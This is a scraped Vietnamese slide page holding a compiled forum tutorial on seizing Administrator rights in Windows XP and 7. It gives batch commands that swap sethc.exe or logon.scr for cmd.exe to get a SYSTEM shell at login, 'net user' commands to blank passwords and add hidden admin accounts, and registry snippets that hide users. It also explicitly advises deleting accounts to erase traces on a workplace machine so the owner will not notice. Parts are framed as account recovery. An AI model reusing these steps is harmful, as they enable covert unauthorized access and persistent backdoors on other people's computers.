30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
 
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
 
Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................
 
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
 
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
 
Sơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdfSơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdf
 
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxTrích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
 

đOạt quyền administrator trong windows xp

  • 1. Đoạt quyền Administrator trong Windows XP Bài viết này hướng dẫn lấy pw Quản trị của máy tính trong trường hợp các bạn cần sử dụng máy tính ở quyền Admin trong khi chỉ được phép sử dụng máy ở dạng ... Guest hay Limited. Không khuyến khích đi phá hoại máy tính người khác. Hiện nay không có quá nhiều cách để phục hồi mật khẩu của tài khoản Administrator trong Windows bị quên mất. Có thể kể đến là dùng công cụ hỗ trợ của đĩaHiren Boot để xóa trắng mật khẩu của tài khoản Administrator hay dùng các công cụ dò tìm mật khẩu trên Net. Tuy vậy, không phải lúc nào chúng ta cũng có công cụ để dùng. Nếu gặp những lúc như thế.... hãy lợi dụng lỗ hỏng của file sethc.exe trên Windows. Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử). Bước 2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi chương trình Notepad.exe. Copyđoạn mã của mình viết, past vào notepad, Save lại với tên là Hackpass.bat cd %systemroot%/system32 rename sethc.exe sethc.exe.bk copy cmd.exe sethc.exe /y Sau đó nhấp kép chuột lên file Hackpass.batđể thực thi! Đoạn mã này làm các nhiệm vụ sau: 1. Sao lưu lại file sethc.exe bằng cáchđặt lại tên là sethc.exe.bk 2. Thay thế file sethc.exe bằng file cmd.exe Đến đây, bạn log off user đang dùng (Guest hoặc Limited user) rồi từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công! Bạn đang có toàn quyền với hệ thống với cửa sổ Command Run này. Chú ý là bạn sẽ không thực hiện được các bước tiếp theo nếu thao tác trên cửa sổ Command Run trong tài khoản Guest hay Limited mà không Log off nó như Lãng khách vừa lưu ý. Chương trình StickyKey đã được thay bằng Command Run Thật ra, với cách này, các bạn có thể biến đổitùy ý các Users trên máy, kể cả các Admin khác. Muốn đổipw một user có sẵn trong máy, ta xem có những users nào đang có trên máy (kể cả users ẩn): net user
  • 2. Xóa trắng password của Administrator (hay tương tự với bất kì user nào): net user Administrator Thêm một tài khoản LangkhachVNP với mật khẩu là 123 net user LangkhachVNP 123 /add Gán tài khoản LangkhachVNP vào nhóm quản trị (sau bước này tài khoản LangkhachVNP mới có quyền Adminitrators): net localgroup Administrators LangkhachVNP /add Nếu bạn sử dụng đúng cấu trúc lệnh phíatrên, bạn sẽ tạo được các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy! Sau khi dùng xong tài khoản LangkhachVNP, xóa nó đi để giấu dấu vết (các thư mục và dữ liệu của User này vẫn còntrong máy, để sau này ... tạo lại user ... dùng tiếp (kể ra ai tinh ý sẽ thấy nó). net user LangkhachVNP /delete Cuối cùng, nếu thư mục system32 được bảo vệ bằng soft tương tự Folder Lock, thì các bạn phải Reset acc Admin bằng Hiren's Boot CD (Lãng khách đã gửi bài hướng dẫn dùng Hiren's Boot USB, nghĩa là dùng USB thay vì CD). Khi reset xong Adminitrators pw, ta có thể chạy file Hackpass.bat ở trên trong Safe Mode (đảm bảo việc sao lưu và đổitên không có gì cản trở bằng bất kì phần mềm gì) để sau này, không cần đăng nhập gì, cứ Shift 5 lần là sẽ có cửa sổ Command cho ta ... tùy ý thao tác... Tất nhiên, sau khi xóa trắng pw Adminitrators, chủ máy sẽ biết, và họ sẽ có những thay đổi. Họ sẽ cố gắng tìm mọi cách ngăn cản chúng ta xâm nhập máy họ, nhưng nếu cmd.exe (đã đổitên) vẫn tồn tại trong System32, thì ta vẫn hoàn toàn làm chủ tình thế. Nhớ là, tạo mới acc Admin xong, nhớ xóa đi để xóa dấu vết.
  • 3. 2 lệnh trên liệu có thực thi được ko (nếu file system là NTFS )trong khi đang login bằng acc User thường. Chỉ có user trong group Administrators, Power Users, System, Create Owner mới có quyền wite , User thường chỉ Read , execute trong system32 folder được mà thôi Còn nếu là FAT thì ok, ko vấn đề gì cả Chú ý nhỏ, nếu bạn làm theo cách trên, thì bạn lúc chưa login vào Win , bấm Shift 5 lần, lúc này bạn sê có permission là System, còn nếu đang login bằng user thường, sau đó bấm shift 5 lần thì vần chỉ là acc user thương thôi Lãng khách không đề cập vấn đề login acc thường hay Admin sau khi rename được sethc.exe, vì chỉ cần Log off tài khoản Guest hay limited thì khi bấm Shift 5 lần là sẽ có đủ quyền Admin như bạn longbottom vừa nói (Lãng khách khi nãy quên chưa đề cập). Nếu file .bat không hoạt động, ta có thể thực hiện thủ công không vấn đề gì (copyvà paste kèm theo rename). Đúng là Lãng khách chưa thử với NTFS, còn, bước xóa trắng pw Admin chỉ là tiền đề cho ta vào Safe mode, chèn file cmd.exe thay cho file sethc.exe, sau này, cứ ở cửa sổ chờ login là ta có thể type vài dòng lệnh là được, chứ nếu ta cứ cố tình sử dụng Hiren's bootUSB không phải là giải pháp hay, và rất mất thì giờ không cần thiết (USB làm việc chậm hơn CD một chút). Lãng khách phải làm thế ở máy cơ quan, khi nào cần vào máy thì Shift 5 lần và type vài dòng lệnh, tạo user mới, dùng xong xóa user đó. Chúng ta không cần thiết tới Hiren's một khi chưa tối cần thiết chứ . Cái mà Lãng khách cần là nếu không để ý kĩ, người ta sẽ không biết là máy mình đã bị sử dụng (vì pw Admin của tất cả các users không hề bị thay đổi, thậm chí cả danh sách các users). Nếu phát hiện pw Admin bị thay đổi thì ... nói làm gì . Với NTFS thì po tay rùi " Access Is Deni" hix hix Đúng thế. Lãng khách đã xem lại. Nếu có quyền Owner hoặc User được Owner cho phép thì ta có thể thay đổi permission cho system32 folder (chờ người ta sơ hở, hoặc mượn sử dụng máy trong quyền Admin, rồi ta tiến hành thay đổi, thì được. FAT32 không có Security Tab này). Đây chính là lí do vì sao chúng ta vẫn được khuyên dùng NTFS, do tính bảo mật cao hơn rất nhiều. Sau khi thử tìm hiểu, Lãng khách biết rằng, ta có thể bảo mật cho bất kì file hay thư mục nào với quyền Owner, mà nếu không có pw Owner thì không có user nào có thể nhìn thấy (nếu cho thuộc tính ẩn với từng user), hay không có quyền đọc, xóa, ... Như vậy, với NTFS system, thì ta sử dụng Hiren's Boot USB (hoặc CD), xóa trắng pw Adminitrator, sau đó, thay đổi permission cho phép truy cập system32 folder, sau đó tạo thay đổicho sethc.exe như Lãng khách đã hướng dẫn, rồi tiếp tục khôi phục bảo vệ gốc cho system32 folder để ... không cho phép thay đổisystem32 folder. Từ sau đó, dù chủ máy có thay đổiuser thế nào, pw thế nào, chỉ cần sethc.exe (thực chất là cmd.exe) vẫn tồn tại, thì cứ ở cửa sổ chờ Login, ta shift 5 lần, rồi tự tiện thêm user khác, cấp quyền Adminitrator, sử dụng, dùng xong del user vừa tạo, nhất cử lưỡng tiện .
  • 4. Lãng khách sẽ hướng dẫn các bạn cách reset Pw Adminitrators (NTFS) bằng USB sau, rất nhanh, dễ hiểu (không cần sử dụng Hiren's Boot). Nếu mà chỉ xóa User thôi thì chưa đủ, bởi vì mỗi khi tạo user và login bằng user đó, OS sẽ tạo 1 profile tương ứng với user đó, cho nên cần phải xóa luôn profile của user đó luôn ,nó nằm trong %systemdriver%document and settings Đương nhiên Lãng khách biết rõ điều này, nhưng đối với NTFS, thì ta hoàn toàn có thể ẩn đi các thư mục đó mà không có dấu vết gì cả. Sau khi dùng xong tài khoản LangkhachVNP, xóa nó đi để giấu dấu vết (các thư mục và dữ liệu của User này vẫn còntrong máy, để sau này ... tạo lại user ... dùng tiếp (kể ra ai tinh ý sẽ thấy nó). Ta nên để ẩn, chứ xóa đi khi có quyền hạn System từ cửa sổ cmd.exe cũng không phải là quá khó . Cũng không có gì khó lắm. Em copyđoạn codesau vào NotePad, rồi thay cụm "Administrator" bằng tên chính xác của User em muốn ẩn đi (ví dụ "LangkhachVNP"), rồi save as thành file HideUsers.reg và nhấp đúp HideUsers.reg, trả lời Yes để chạy nó: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList] "Adminstrator"=dword:00000000 Lưu ý, khi em muốn login tài khoản đã ẩn đi, trong cửa sổ chờ Log on, Ctrl+Alt+Del 2 lần, rồi gõ chính xác username và mật khẩu rồi Enter. Tuy nhiên, chưa chắc các user em nhìn thấy ở cửa sổ Log on đã đúng như em thấy. Chẳng hạn, Lãng khách có thể đổi tên Acc Administrator thành Admin, và có thể lập User Langkhach, sau đó rename tên của Langkhach thành Lãng khách cho dễ nhìn. Sau khi Rename cho dễ nhìn, thì tên user thật sự máy nhận biết vẫn là Langkhach chứ không phải Lãng khách. Để biết chắc chắn máy có những user gì, kể cả user ẩn, em có thể xem lại ở bài viết đầu tiên, ta xem có những users nào đang có trên máy (kể cả users ẩn): Trước tiên, Start--->Run. Gõ cmd rồi enter. Tiếp tục gõ Net user rồi enter, danh sách các users sẽ hiện ra. Ghi nhớ các tên user này để cho từng user ẩn đi hay hiện lên tùy thích bằng cách edit file Reg khi nãy của Lãng khách. Tương tự, muốn hiện lại user ẩn đó, em lại dùng đoạn codesau (chú ý, điền chính xác tên user cần hiện lên thay "Administrator"): Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList] "Adminstrator"=dword:00000001 Đoạn codenày sẽ thay giá trị dword từ "0" sang "1", em chú ý.
  • 5. Thủ thuật với registry : Start + Run : type : regedit Tìm theo đường dẫn HKEY_LOCAL_MACHINESo ftwareMicrosoftWindows NTCurrentVersionWinlogo nSpecialAccountsUserList create a new DWORD value với tên user cần ẩn. Muốn ẩn user nào thì bạn phải gõ chính xác tên user đó. 0 - Hides the user just from the welcome screen 1 - The user is shown Sau khi thêm user cần ẩn : Lãng khách nhớ rằng đã có lần nói qua về vấn đề này. Trước đây, trên Internet tràn lan các bài viết hướng dẫn lấy quyền Administrator của Windows mà chỉ cần can thiệp trực tiếp ngay trên Windows quyền Limited. Nhưng chỉ áp dụng thành công trên FAT32. Từ khi NTFS trở nên phổ biến, đồng thời Windows đã biết và fix lại lỗ hổng này, thì thủ thuật nói trên đã đi vào quên lãng. Thực ra thì không phải là Microsoft đã fixed và NTFS trở nên phổ biến thì chúng ta không còngiải pháp nào. Lãng khách đã phải giúp đỡ rất nhiều người lấy lại quyền Admin trong những trường hợp như vậy bởi rất nhiều lí do không tiện nhắc tới (không CD, không hỗ trợ USB boot). Đối với mỗi trường hợp nâng cấp thì có một cách giải quyết khác nhau. Điều kiện cần là các bạn phải có pw một tài khoản Limited. Các bạn chú ý rằng, có những trường hợp, áp dụng một vài bước theo tất cả các bước hướng dẫn là thừa, nhưng Lãng khách chỉ muốn
  • 6. hướng dẫn một cách chung nhất. Có nhiều cách đơn giản hơn nhiều đốivới từng trường hợp cụ thể. 1. Đăng nhập quyền Limited mà bạn đang có một cách bình thường. Mục đíchlà để Windows lưu trữ tên người dùng cuối cùng đăng nhập (chính là tên user Limited bạn đăng nhập). Mặc định tính năng này được bật, rất ít khi nó bị disabled (phải sử dụng Regedit). Lãng khách yêu cầu bước này là vì, trong Windows, tên user tại Welcome screen hoàn toàn có thể thay đổi, nhưng thực tế thì tên user được tạo ban đầu vẫn được quản lí mà các bạn có thể không hề hay biết. 2. Restart máy tính ở chế độ Safe-mode. Khi này, tên user limited của bạn sẽ không được hiển thị (trong Safe-mode, Windows chỉ chấp nhận tài khoản Admin). Chú ý bạn không được nhấp chuột vào bất kì tên user nào hiện ra trong danh sách. Nếu lỡ nhấp phải một tên user nào rồi, làm lại bước 1. 3. Bấm tổ hợp phím CTRL+ALT+DEL 2 lần. Cửa sổ đăng nhập hiện ra. Nếu các bạn làm đúng hướng dẫn, tên user limited thực sự sẽ hiện ra sẵn ở ô username. Ô pw, các bạn nhập pw vào rồi ENTER. 4. Bấm tổ hợp phím Ctrl+F 2 lần mở 2 cửa sổ tìm kiếm. Ở một cửa sổ tìm kiếm, các bạn gõ tìm file cmd.exe, cửa sổ cònlại tìm file sethc.exe. 5. Chờ cho quá trình tìm kiếm kết thúc, tại cửa sổ tìm thấy file cmd.exe, các bạn phải chuột một file cmd.exe chọn copy(tốt nhất là file cmd.exe trong system32 folder) rồi bấm tổ hợp phím Windows+D ra Desktop, bấm Ctrl+V dán ra đó. 6. Nhấp đúp chạy file cmd.exe tại desktop, gõ dòng lệnh sau rồi ENTER: copycmd.exe sethc.exe 7. Lần lượt nhấp phải chuột từng file sethc.exe tìm được ở cửa sổ tìm kiếm cònlại, phải chuột chọn Open Containing Folder. Có bao nhiêu file sethc.exe tìm được, bạn nên mở được ngần ấy thư mục chứa. Càng nhiều file sethc.exe tìm được, Windows của bạn được bảo mật càng tốt. Nếu chỉ có một file sethc.exe tìm được, bạn cần phải xem lại cách sử dụng Windows của mình . 8. Giữ Ctrl, nhấp trái chuột vào file sethc.exe tại Desktop (thực chất là bản copycủa cmd.exe) kéo thả vào từng thư mục chứa file sethc.exe vừa mở từ cửa sổ tìm kiếm, trả lời Yes để xác nhận quá trình ghi đè thay thế. 9. Các bước lấy quyền Admin còn lại đã cực kì đơn giản rồi, các bạn có thể tham khảo bài viết dưới đây của Lãng khách: Cách xem định dạng ổ cứng HDD là FAT, FAT 32 hay NTFS Hiện nay máy tính Windows chủ yếu sử dụng định dạng NTFS là mặc định. Bởi NTFS hỗ trợ một tính năng quan trọng, đó là cho phép bạn lưu trữ file có dung lượng lớn hơn 4GB. Vậy nếu muốn chuyển qua định dạng NTFS cho ổ đĩa của mình thì trước tiên bạn phải xác định chuẩn định dạng của ổ cứng HDD là FAT, FAT32, hay NTFS trước đã. CÁCH XÁC ĐỊNH CHUẨN ĐỊNH DẠNG CỦA Ổ CỨNG HDD LÀ FAT, FAT 32 HAY NTFS Bước 1: Đầu tiên từ màn hình desktop bạn mở My Computer.
  • 7. Bước 2: Tiếp đến bạn nhấn chuột phải vào ổ C/D chọn Properties. Lúc này ở tab General bạn quan sát phần File system. Tại đây sẽ ghi chuẩn định dạng của ổ đĩa mà bạn đang sử dụng. Ví dụ của tôi là NTFS. http://thuthuat.taim ienphi.v n/x ac -dinh-hdd-la-fat-fat-32-hay -ntfs -4407n.as px Đó là cách đơn giản giúp bạn xác định chuẩn định dạng của ổ cứng là HDD là FAT, FAT 32, hay NTFS. Hiện nay hầu hết người dùng đã chuyển sang NTFS vì tính khả dụng của nó. Nếu chưa chuyển thì bạn tham khảo đổi FAT32 sang NTFS không dùng phần mềm mà chúng tôi đã cung cấp. Bạn chỉ được truy cập vào máy tính với một quyền user thông thường và điều đó khiến bạn bực bội mỗi khi cần cài đặt hay sử dụng một chương trình nào đó. Bài hướng dẫn này sẽ giúp bạn giải tỏa bực bội bằng cách “hack chơi” mật khẩu của Admin mà không cần sử dụng tới một phần mềm thứ ba nào cả. Lưu ý: Cách này không áp dụng được cho ổ đĩa NTFS - Vào Start > Run gõ lệnh cmd và nhấn Enter. Cửa sổ lệnh sẽ được mở ra và nhập chính xác các câu lệnh sau: cd trở về thư mục gốc cdwindowssystem32 vào thư mục system32 mkdir hackdir tạo thư mục hackdir
  • 8. copy logon.scrhackdirlogon.scr sao lưu file logon.scrvào thư mục hackdir copy cmd.exe hackdircmd.exe sao lưu file cmd.exe vào thư mục hackdir del logon.scrxóa file logon.scrgốc copy hackdircmd.exe logon.scrsao lưu file cmd.exe trong thư mục hackdir trở về system32 và đổi tên thành logon.scr exit đóng cửa sổ lệnh - Sau đó khởi động lại máy tính. Với các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông thường bằng lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền system chứ không phải quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể tiến hành thay đổi mật khẩu của tài khoản Admin trên máy. Sau khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ lệnh hiện ra. Tại đây bạn có thể tiến hành theo 1 trong 2 cách sau: Cách 1: Đổi mật khẩu tài khoản Admin sẵn có Tại cửa sổ lệnh có thể sử dụng một trong các lệnh sau: net user <username> <new pass> thay mật khẩu tài khoản quản trị bằng mật khẩu mới hoặc net user <username> xóa trắng mật khẩu của tài khoản này Ví dụ: net user Administrator 123 câu lệnh này đổi mật khẩu tài khoản Administrator thành 123. Cách 2: Thêm một tài khoản mới với quyền Admin Tại cửa sổ lệnh lần lượt gõ các lệnh sau: net user <username> <password> /add thêm một tài khoản với tên và mật khẩu tương ứng net localgroup Administrators <username> /add đưa tài khoản vừa tạo vào nhóm quản trị Vậy là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử dụng mật khẩu vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với quyền quản trị mức cao nhất. Quan trọng: Đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để hệ thống của bạn hoạt động trở lại như bình thường.
  • 9. Lợi dụng StickyKey chiếm quyền truy cập hệ thống Anh Vinh, có cách nào lấy lại cái quyền Admin không vậy ? Hồi bữa cái máy của cậu Anh cứ vào Windows là phải click chọn account (dù chỉ có 1 account). Tý tức quá, vào Account User vọc. Vọc một hồi thấy trong cái Group có 1 tài khoản Administrator, 1 cái user đang dùng (có name là John nằm trong Group Admin -> có quyền admin) và một số user Guest. Tý thấy nhiều quá nên….disable hết ! Lỡ tay disable luôn cái user Administrator (vì có cái user John nằm trong Group Admin nên có thể disable user Administrator). Sau đó chỉ còn lại cái user John nằm trong Group Admin mà khi nhấn vào user này, nhìn bên tay phải có một biểu tượng Administrator, Tý thấy vậy nên nhấn “Remove” khỏi group Administrator ==> user John mất luôn quyền admin. Giờ không thể làm được gì hết, không thể vào Local Group để enable lại vì không có quyền Admin, không thể Defragment ổ cứng luôn. Đại ý là máy tính hiện tại đã bị vô hiệu hóa tài khoản quản trị cao nhất (Administrator). Đồng thời, tài khoản hiện tại (user John) đã bị “giáng chức” từ Admin xuống thành user bình thường (do đã bị remove ra khỏi nhóm Admin) —> user John đã biến thành user Guest, không có bất kỳ quyền hạn nào với hệ thống, làm cái gì cũng bị cấm ! Chỉ có những tài khoản ở nhóm quản trị (Administrators) hoặc tài khoản Administrator mới có quyền cho một user nào đó vào nhóm Admin mà thôi. Trong trường hợp của nó, tất cả các tài khoản thuộc nhóm Administrators đã bị vô hiệu hóa ! Vì vậy, về mặt lý thuyết thì pógiò, không có cách nào có thể giúp phục hồi bởi vì trong tay người dùng không hề có một tài khoản có quyền Admin để thực hiện bất cứ việc gì, kể cả thực hiện ngoài DOS. Tuy nhiên có một cách có thể giúp bạn enable lại tài khoản Adminstrator và làm rất nhiều chuyện khác như xóa, di chuyển các user vào các Group khác nhau. Trong trường hợp này, tôi sẽ phục hồi lại quyền hạn Admin cho user John như lúc ban đầu mặc dù trong tay không hề có tài khoản quản trị nào. Không biết cái tiêu đề bài viết có đúng không nữa, mà tôi cũng chẳng nghĩ ra được cái khác. Có một phương pháp mà giang hồ đồn đại là “lỗ hổng bảo mật” của Windows, vẫn áp dụng được cho đến phiên bản mới nhất là Windows 7, tôi vừa mới thực hiện thành công. Đó là lợi dụng tính năng Sticky Key của Windows. Đây là ứng dụng nhỏ dùng để hỗ trợ người khuyết tật. Khi vào màn hình đăng nhập Windows, bạn chỉ cần nhấn phím Shift 5 lần, bạn sẽ thấy cửa sổ Sticky Key hiện ra. Theo mô tả kỹ thuật thì Windows sẽ sử dụng quyền hệ thống để gọi tập tin “sethc.exe” trong thư mục System32. Và thủ thuật mà giang hồ đồn đại là chúng ta sẽ đánh lừa Windows bằng cách thay thế tập tin “sethc.exe” bằng tập tin “cmd.exe”, dĩ nhiên là phải đổi lại tên. Tức là khi
  • 10. bạn nhấn phím Shift 5 lần, Windows sẽ gọi cửa sổ Command Prompt (thay vì gọi ứng dụng Sticky Keys) với quyền hạn của hệ thống –> như vậy bạn có thể thực thi các câu lệnh trong cửa sổ command Prompt mà không gặp vấn đề gì về quyền bởi vì quyền System là quyền cao nhất. Vấn đề là trong trường hợp hiện tại của đứa em, nó không thể thay thế được tập tin “sethc.exe” bằng tập tin “cmd.exe” do tài khoản hiện tại hoàn toàn không có quyền gì cả –> Tập tin “sethc.exe” là tập tin hệ thống và nếu user không đủ quyền thì không thể copy, đổi tên hay xóa nó được. Giả sử user đó có quyền admin thì cũng phải thực hiện thao tác chiếm quyền truy cập thì mới mong đổi tên được. Tôi nghĩ là trong DOS hoặc trong WinXP mini cũng không thể tác động gì được tập tin này. Vì vậy, trong trường hợp này buộc phải sử dụng môi trường Linux để thực hiện. Để làm được điều này, cách dễ nhất là tải về Hiren’sBootCD 10.6 và sử dụng Mini Linux được tích hợp sẵn. Tóm lại, điều kiện để thực hiện : – Windows có thể hiển thị được màn hình đăng nhập. – Đĩa CD cứu hộ Hiren’sBootCD v10.6 Bạn có thể tìm và tải đĩa CD này trên mạng, dung lượng khoảng 270Mb. Sau khi tải về hãy giải nén và ghi nó ra thành một đĩa CD, ghi ở chế độ “Ghi ảnh” và chỉ tới tập tin ISO vừa giải nén xong. Bất cứ phần mềm ghi đĩa nào cũng có tính năng ghi đĩa từ file ISO. Có thể sử dụng CDBurnerXP. Sau khi ghi đĩa xong, khởi động máy tính từ đĩa CD này. Nếu màn hình sau không hiện ra, bạn cần phải vào CMOS để chỉnh lại thứ tự khởi động là ưu tiên khởi động từ đĩa CD trước, sau đó mới đến ổ cứng. Từ màn hình trên, bạn chọn Mini Linux. Đợi một chút cho đến khi vào được Linux, đóng tất cả các cửa sổ nhấp chuột phải vào màn hình desktop và chọn Mount/Unmount như hình sau : Cửa sổ hiện ra, bạn chọn ổ đĩa chứa hệ điều hành Windows và bấm OK như hình sau :
  • 11. Cửa sổ hiện ra thông báo thành công, bấm OK Cửa sổ FileManager hiện ra, bạn chọn PCManFM và nhấn OK như hình sau : Cửa sổ truy cập file hiện ra, ở cột bên tay trái, truy cập theo đường dẫn : mnt > sda2 (ổ đĩa đã mount hồi nãy) và bạn sẽ thấy toàn bộ nội dung của ổ đĩa cài hệ điều hành Windows đang dùng.
  • 12. Từ đây, bạn truy cập vào thư mục “WindowsSystem32”. Tìm đến tập tin “sethc.exe” (gõ tên trên bàn phím, nó sẽ tự động nhảy đến tập tin đó). Khi đã tìm ra, nhấp chuột phải vào đó và chọn Rename như hình sau : Một cửa sổ nhỏ hiện ra, bạn đổi tên lại thành “sethc.exe.bk” và bấm OK như hình sau : Tiếp theo tìm tập tin “cmd.exe” (cũng trong thư mục System32 luôn), nhấp chuột phải vào đó và chọn Copy
  • 13. Sau đó nhấp chuột phải vào vùng trống và chọn Paste, cửa sổ sau sẽ hiện ra : Bạn đổi tên nó thành “sethc.exe” như trong hình và bấm Rename. Vậy là xong, giờ hãy đóng cửa sổ lại, nhấp chuột phải vào màn hình Desktop và chọn “Logout” > chọnReboot System để khởi động lại hệ thống. Nhớ lấy đĩa CD ra khỏi ổ để nó khỏi khởi động từ đĩa CD. Sau khi khởi động lại hệ thống và đến màn hình đăng nhập Windows, bạn nhấn phím Shift 5 lần và sẽ thấy cửa sổ Command Prompt hiện ra như sau :
  • 14. Trước đó tôi đã gỡ bỏ user anhhangxom ra khỏi nhóm Administrators và hiện tại nó chỉ là một user Guest bình thường. Giờ tôi sẽ sử dụng dòng lệnh để cho phép user anhhangxom vào nhóm quản trị. Từ cửa sổ Command Prompt, gõ dòng lệnh “net localgroup Administrators anhhangxom /add” như hình sau : Windows thông báo việc add thành công, đóng cửa sổ này lại và truy cập vào tài khoản anhhangxom, nó đã được “thăng chức” làm Admin. Đồng thời, bạn có thể active tài khoản Administrator bằng cách gõ dòng lệnh “net user Administrator /active:yes” -> cái này thì tôi đã có lần giới thiệu rồi. Cuối cùng cũng xong, kiếm cái gì nuốt cho no rồi làm tiếp thôi. Chỉnh sửa lại bài viết rồi gửi cho nó cái đường link để làm theo, hy vọng được. Cũng từ đây cho thấy, việc lợi dụng StickyKeys này có thể sẽ giúp người nhưng cũng có thể hại người. Nếu ai đó lợi dụng cách này để remove tài khoản của bạn ra khỏi nhóm quản trị, đồng thời vô hiệu hóa luôn tài khoản Admin thì tiêu ! Hoặc họ có thể sử dụng cách này để đăng nhập vào máy tính của bạn thông qua user cao nhất là Administrator. Hơn 90% các máy tính cài Win7 bỏ trống mật khẩu của User này và bình thường, user Administrator luôn bị Disable. Do đó, khi cần thiết thì hãy gỡ bỏ tính năng nhấn Shift 5 lần này.